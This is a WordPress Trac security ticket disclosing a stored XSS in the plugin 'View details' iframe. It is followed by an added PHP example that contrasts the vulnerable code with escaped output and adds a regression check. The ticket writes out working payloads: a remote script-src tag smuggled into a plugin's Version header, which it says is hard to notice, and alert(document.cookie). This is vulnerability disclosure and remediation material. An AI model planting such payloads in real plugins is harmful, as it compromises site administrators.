[wp-trac] [WordPress Trac] #53020: Stored XSS via «View details» plugin iFrame
WordPress Trac
noreply at wordpress.org
Fri May 7 13:35:34 UTC 2021
#53020: Stored XSS via «View details» plugin iFrame
--------------------------+-----------------------------
Reporter: m0ze | Owner: (none)
Type: defect (bug) | Status: new
Priority: normal | Milestone: 5.8
Component: Security | Version: trunk
Severity: normal | Resolution:
Keywords: has-patch | Focuses: administration
--------------------------+-----------------------------
Description changed by SergeyBiryukov:
Old description:
> I found a way to use the XSS attack vector - through an iFrame with a
> detailed description of the plugin (plugin «View details» iFrame).
>
> === Possible operation options:
>
> * substitution or modification of the original plug-in to hide malicious
> code;
>
> * distribution of the modified plugin through third-party resources.
>
> === Steps To Reproduce:
>
> 0. open any existing plugin from the official WordPress repo, e.g. Hello
> Dolly.
> 1. change the version number to +1 (as a minimum) - from `Version: 1.7.2`
> to `Version: 1.7.3`.
> 2. add your payload right after the last digit - `Version: 1.7.3<script
> src="https://m0ze.ru/payload.a.js"></script>`
> 3. check the plugin info via dashboard, «View details» link.
>
> If you use the payload specifically as a `<script src=...></script>`,
> then visually, except for one digit in the plugin version, nothing will
> change. Other payloads also work
> (`<script>alert(document.cookie)</script>` etc.), but they add extra
> special characters on the right of the plugin version, which may alert
> the website administrator.
>
> === Screenshots:
>
> [[Image(https://i.imgur.com/7pz6UMh.png)]]
>
> [[Image(https://i.imgur.com/E7ejGkJ.png)]]
>
> [[Image(https://i.imgur.com/r2WQmFQ.png)]]
>
> === Code:
>
> **/wp-admin/includes/plugin-install.php, 881-884:**
>
> {{{#!php
> case 'newer_installed':
> /* translators: %s: Plugin version. */
> echo '<a class="button button-primary right disabled">' .
> sprintf( __( 'Newer Version (%s) Installed' ), $status['version'] ) .
> '</a>';
> break;
> }}}
>
> === Quick fix:
>
> `strip_tags($status['version'])`
>
> === Video:
>
> **YouTube short demo:** https://youtu.be/_IRcQ82wovY
>
> === Impact
>
> Malicious JavaScript code injections, the ability to combine attack
> vectors against the targeted system, which can lead to a complete
> compromise of the resource.
>
> There is also an unknown number of plugins that display diagnostic
> information about the site, including the names and versions of plugins,
> where this vulnerability will also be triggered, f.e.: Asset CleanUp:
> Page Speed Booster, WP Cerber Security, Anti-spam & Malware Scan and many
> other plugins.
New description:
I found a way to use the XSS attack vector - through an iFrame with a
detailed description of the plugin (plugin «View details» iFrame).
=== Possible operation options:
* substitution or modification of the original plug-in to hide malicious
code;
* distribution of the modified plugin through third-party resources.
=== Steps To Reproduce:
0. open any existing plugin from the official WordPress repo, e.g. Hello
Dolly.
1. change the version number to +1 (as a minimum) - from `Version: 1.7.2`
to `Version: 1.7.3`.
2. add your payload right after the last digit - `Version: 1.7.3<script
src="https://m0ze.ru/payload.a.js"></script>`
3. check the plugin info via dashboard, «View details» link.
If you use the payload specifically as a `<script src=...></script>`, then
visually, except for one digit in the plugin version, nothing will change.
Other payloads also work (`<script>alert(document.cookie)</script>` etc.),
but they add extra special characters on the right of the plugin version,
which may alert the website administrator.
=== Screenshots:
https://i.imgur.com/7pz6UMh.png
https://i.imgur.com/E7ejGkJ.png
https://i.imgur.com/r2WQmFQ.png
=== Code:
**/wp-admin/includes/plugin-install.php, 881-884:**
{{{#!php
case 'newer_installed':
/* translators: %s: Plugin version. */
echo '<a class="button button-primary right disabled">' . sprintf(
__( 'Newer Version (%s) Installed' ), $status['version'] ) . '</a>';
break;
}}}
=== Quick fix:
`strip_tags($status['version'])`
=== Video:
**YouTube short demo:** https://youtu.be/_IRcQ82wovY
=== Impact
Malicious JavaScript code injections, the ability to combine attack
vectors against the targeted system, which can lead to a complete
compromise of the resource.
There is also an unknown number of plugins that display diagnostic
information about the site, including the names and versions of plugins,
where this vulnerability will also be triggered, f.e.: Asset CleanUp: Page
Speed Booster, WP Cerber Security, Anti-spam & Malware Scan and many other
plugins.
--
Ticket URL: <https://core.trac.wordpress.org/ticket/53020#comment:6>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform
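As an added example (not code from the ticket or from WordPress core), the reported rendering is shown beside an output-escaped version together with a small regression check; `__()` and `esc_html()` are stubbed so the script runs under a plain PHP CLI, and the sample version string and its host are constructed placeholders.

```php
<?php
// Added example, not WordPress core code: the reported rendering beside an
// escaped one, plus a check a unit test could run. Assumes the PHP CLI;
// __() and esc_html() are stubbed so the script runs outside WordPress.

if ( ! function_exists( '__' ) ) {
    // Stand-in for WordPress's __(): returns the string untranslated.
    function __( $text ) { return $text; }
}
if ( ! function_exists( 'esc_html' ) ) {
    // Stand-in for WordPress's esc_html(): encode for an HTML text context.
    function esc_html( $text ) {
        return htmlspecialchars( (string) $text, ENT_QUOTES | ENT_HTML5, 'UTF-8' );
    }
}

// Constructed sample: a Version header carrying the payload shape from the
// ticket (placeholder host, not a real script).
$status = array(
    'status'  => 'newer_installed',
    'version' => '1.7.3<script src="https://example.invalid/p.js"></script>',
);

// Vulnerable rendering, as in the reported plugin-install.php lines:
// the version string is concatenated into markup without escaping.
function render_button_unescaped( array $status ) {
    return '<a class="button button-primary right disabled">'
        . sprintf( __( 'Newer Version (%s) Installed' ), $status['version'] )
        . '</a>';
}

// Hardened rendering: escape the untrusted value on output, so the payload
// is shown as literal text instead of being parsed as a <script> element.
function render_button_escaped( array $status ) {
    return '<a class="button button-primary right disabled">'
        . sprintf( __( 'Newer Version (%s) Installed' ), esc_html( $status['version'] ) )
        . '</a>';
}

// Regression check: any tag other than the intended <a>...</a> in the output
// means untrusted markup got through.
function contains_injected_tag( string $html ) {
    return (bool) preg_match( '#<(?!/?a\b)[a-zA-Z]#', $html );
}

echo render_button_unescaped( $status ), PHP_EOL;
echo render_button_escaped( $status ), PHP_EOL;
var_dump( contains_injected_tag( render_button_unescaped( $status ) ) );
var_dump( contains_injected_tag( render_button_escaped( $status ) ) );
```

The `strip_tags()` quick fix proposed in the ticket removes tags from the value, whereas escaping on output keeps the version string intact and is WordPress's standard late-escaping practice.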